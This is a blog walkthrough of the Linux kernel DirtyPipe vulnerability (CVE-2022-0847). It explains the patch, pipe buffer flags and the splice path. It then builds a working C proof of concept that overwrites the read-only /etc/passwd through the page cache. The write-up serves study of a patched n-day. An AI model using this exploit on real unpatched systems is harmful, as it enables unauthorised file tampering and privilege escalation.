- Published on
DirtyPipe CVE-2022-0847
- Authors
- Name
- stdnoerr
- @stdnoerr
Table of Contents
Before DirtyCOW, I looked at DirtyPipe for the CVE n-day practice. I wanted to understand how it worked and it was a fairly new one at that time (July 2023). But its been a while since I did it so this one will be more like a walkthrough than a story-time. I will also include steps that I didn't originally did. I will use Linux Kernel v5.16.10 as the target environment for developing the exploit. Lets jump right in!
Environment
There's nothing special required for the environment. You just have to download the kernel source and use the default config to compile. If you don't know how to compile, follow this blog. My setup can be found here if you don't want to set it up yourself. The setup includes the bzImage
and an initramfs.
Analysis
The Patch
Like previous post, we will start with the patch commit
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
return 0;
buf->ops = &page_cache_pipe_buf_ops;
+ buf->flags = 0;
get_page(page);
buf->page = page;
buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
break;
buf->ops = &default_pipe_buf_ops;
+ buf->flags = 0;
buf->page = page;
buf->offset = 0;
buf->len = min_t(ssize_t, left, PAGE_SIZE);
The following message accompanied the patch:
lib/iov_iter: initialize "flags" in new pipe_buffer
The functions copy_page_to_iter_pipe() and push_pipe() can both allocate a new pipe_buffer, but the "flags" member initializer is missing.
The patch and message are straightforward, the vulnerability is uninitialized member bug. The uninitialized member is flags
of the struct pipe_buffer
. This bug is found in two functions related to pipes:
Pipe Buffer
Pipes and FIFOs (also known as named pipes) provide a unidirectional interprocess communication channel. A pipe has a read end and a write end. Data written to the write end of a pipe can be read from the read end of the pipe. — pipe(7)
By convention, the first descriptor is the read end and the second is the write end. One can read and write data from/to a pipe whenever they want. Data unread will persist until it is read. reading from an empty pipe and writing to a full pipe (will be discussed later) will block the operation, although pipes can be configured for nonblocking operations using pipe2
syscall.
In Linux Kernel, pipes are implemented as a virtual filesystem (VFS) and the file descriptors returned belong to pseduo files in this filesystem. Actually, both of the file descriptors point to the same pseudo file but with different permissions (the first has read-only and second has write-only permissions). The inode for these files has the structure pipe_inode_info
in its inode->i_pipe
member (inodes store metadata for files).
Since there is no actual disk memory available for this filesystem, the data is stored in main memory pages. Each page belongs to a single pipe_buffer
, stored in pipe_buffer->page
member, for better handling since a pipe can have multiple buffers. The buffer pointers are stored in pipe_inode_info->bufs
member.
By default, the number of buffers a pipe gets is 16
, making the default capacity 65,536
bytes. But a pipe's capacity can be configured using fctnl
. F_GETPIPE_SZ
can be used to query the size (in bytes) and F_SETPIPE_SZ
can be used to set the size. The minimum limit of a pipe's size is the page size of the system (4096
for most) and upper limit (for unprivileged user) is 1MiB (1,048,576
) but the upper limit is configurable via the /proc/sys/fs/pipe-max-size
using root user.
flags
Since the vulnerability is uninitialization of flags
member, it needs special attention. The possible values of this member are written right above the pipe_buffer
struct. We have to figure out what flag can help us exploit the vulnerability in case it is not removed. At that time (July 2023), I concluded the following about each flag:
flag | description |
---|---|
PIPE_BUF_FLAG_LRU | set at multiple locations in splice when we acquire a page from a buffer, only used was found on FUSE which just adds the page to LRU Cache |
PIPE_BUF_FLAG_ATOMIC | never set never used |
PIPE_BUF_FLAG_GIFT | set by user through splice and vmplice, if this flag is not set the userspace page is not reused for kernel copying in (vm)splice |
PIPE_BUF_FLAG_PACKET | for pipes with O_DIRECT flag (can be set through fcntl or pipe2), kernel does not perform buffering and writes the iovecs as “packets”. no useful use found |
PIPE_BUF_FLAG_CAN_MERGE | for pipes without O_DIRECT, set in pipe_write, used to check if new data that's to be written to the pipe can be copied to this buffer |
PIPE_BUF_FLAG_WHOLE | set by user in pipe2, if read doesn't read exactly n bytes, return error |
PIPE_BUF_FLAG_LOSS | weird flag, for some kind of data loss. The only use found sets pipe->note_loss = true when no more data can be read from the buffer |
The only interesting flags seemed to be PIPE_BUF_FLAG_GIFT
and PIPE_BUF_FLAG_CAN_MERGE
.
PIPE_BUF_FLAG_GIFT
At first glance, PIPE_BUF_FLAG_GIFT
seems the right choice since its description tells us that the userspace, essentially, "gifts" the userspace page to the kernel indicating the userspace doesn't need the page anymore and kernel is free to repurpose the page for other things. But the flag doesn't block any attempts to write to the page and doing so can lead weird behavior.
But in order to actually understand this flag's purpose and whether or not it will help us in exploiting the vulnerability, we need to look at the underlying code.
This flag is actually the kernel-space equivalent of the SPLICE_F_GIFT
flag that can be given to splice
and vmsplice
syscalls. splice
syscall is used to transfer between two file descriptors without copying between kernel-space and userspace, one of the file descriptors has to be a pipe. And vmsplice
is used to transfer data to or from a pipe and a memory area instead of a file descriptor.
SPLICE_F_GIFT
is unused in splice
but when used with vmsplice
allows the kernel to repurpose the underlying page. SPLICE_F_GIFT
is used to add PIPE_BUF_FLAG_GIFT
to the pipe_buffer
modified by the syscall.
But after reading the code multiple times, I found that PIPE_BUF_FLAG_GIFT
is a hint rather than an obligation to repurpose the page. So, essentially, it is allowed to repurpose the page but NOT required. The only areas where the page is actually repurposed can be seen here and here
Since these uses where outside of the core pipe code, I decided to not pursue them. But as a side effect of all this code review, I found a call path between splice
and copy_page_to_iter_pipe()
:
In this path, the page passed to copy_page_to_iter()
is that of the file from which read (splice) is being done. The pages are extracted by this line by converting the iov_iter
to pagevec
. Then each page is given to copy_page_to_iter()
This will come handy later.
PIPE_BUF_FLAG_CAN_MERGE
PIPE_BUF_FLAG_PACKET
and PIPE_BUF_FLAG_CAN_MERGE
are reciprocal of each other. The former makes each write and read from/to a single pipe_buffer
while the latter allows multiple requests, to and from the pipe, to share a pipe_buffer
. This can potentially be dangerous if the page being written to is a page that shouldn't be shared. This hypothesis is also supported by the CVE description that reads:
An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
The pipe_buffer
-sharing flag is only set here in pipe_write
, the function responsible for writes on pipe file descriptors. It is set when a new pipe_buffer
is allocated and O_DIRECT
is not set on the pipe. A new buffer is allocated when the previous one is full or cannot be shared (doesn't have PIPE_BUF_FLAG_CAN_MERGE
flag). But the page in this case is allocated via alloc_page
so it is completely fine to write to it.
But if we look at the patch again, the buffer in copy_page_to_iter_pipe()
doesn't allocate a page so it's probably our target function. And since we have a valid call path between splice
and copy_page_to_iter_pipe()
, we can test this theory.
The splice
syscall also has an other angle to it that makes it a requirement to exploit this vulnerability. The function copy_page_to_iter_pipe()
is only called when the struct iov_iter *
passed to copy_page_to_iter()
has the type ITER_PIPE
(indicating that the iovec is a vector of pipes) and as it turns out, this type is only set in splice.
Mid summary
So we identified that PIPE_BUF_FLAG_CAN_MERGE
is the flag we need to set in the uninitialized flags for the function copy_page_to_iter_pipe()
since its the function that uses the provided page and we need to utilize this via the discovered call path from splice
in order to get to that function.
Exploitation
1. Create pipe
First things first, we need to actually allocate a pipe in order to actually exploit and vulnerability. While we are at it, lets also open a file that we only have read-only access to; to test if we can actually write to it and for splice
. For now, lets use /etc/passwd
as our target file.
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
return 0;
}
PIPE_BUF_FLAG_CAN_MERGE
to pipe's buffers
2. Assign We need to make sure that when we make the splice
syscall to call copy_page_to_iter_pipe()
the pipe_buffer
has PIPE_BUF_FLAG_CAN_MERGE
flag in it. We will use this code path in pipe_write
to do this. It's a pretty obvious code path that is triggered whenever we perform write
on the pipe[1]
file descriptor. We just need to fill it completely to put the flag in all buffers and then just simply read the data. This will drain the pipe and free the pages but the flag will remain. Since, by default, a pipe has 16
buffers and each can hold 4096
bytes, we will have to write 16*4096
bytes. But we can change the size of the pipe to reduce the number of pipe buffers and ultimately reach the goal early. We will set the pipe's size to 4096
or 1 buffer so we only have to write 4096
bytes to it.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
return 0;
}
3. Trigger vulnerability via splice
Since the path to vulnerable function copy_page_to_iter_pipe()
is via splice
and it goes through splice_file_to_pipe()
, we will perform a splice
from the target file to the pipe. Since copy_page_to_iter_pipe()
will get the file's page, the buffer's page will be replaced with that of the file's. Subsequent writes to pipe should write to the file's, even thought it is read-only. The splice size will be 1
to use the lowest value possible to trigger the vulnerability.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
return 0;
}
4. Write to the target file
At this point, the file's page is being used as the pipe_buffer
's backing page. Now, writing to the pipe should overwrite the file's content.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
// 4. Overwrite the target file
write(pipefd[1], "stdnoerr", 8);
lseek(fd, 0, SEEK_SET);
read(fd, buffer, 60);
buffer[60] = '\0'; // Null-terminate the buffer
printf("Data read from target file: %s\n", buffer);
return 0;
}
Output

r
of root
is still there before the string stdnoerr
. This is because when we spliced the page, the pipe buffer's pointer was set to whatever size we specified. This highlights a limitation of DirtyPipe, it cannot overwrite the first byte of the file. But luckily, this is rarely required.Limitations
DirtyPipe has a few limitations:
- It cannot overwrite the first byte
- It cannot write more than
PAGE_SIZE - 1
bytes - It cannot overwrite memory pages; the data to be overwritten should be on disk
- It cannot write contents more than the file's original size
Conclusion
It was fun trying to understand DirtyPipe, unraveling it like a puzzle and then putting these pieces together to make an exploit. The vulnerability turned out to quite simple and easy to exploit, albeit with some limitations.
Hopefully, it was helpful to you as well. If you found any mistake or want to chat up, hit me up on discord or twitter.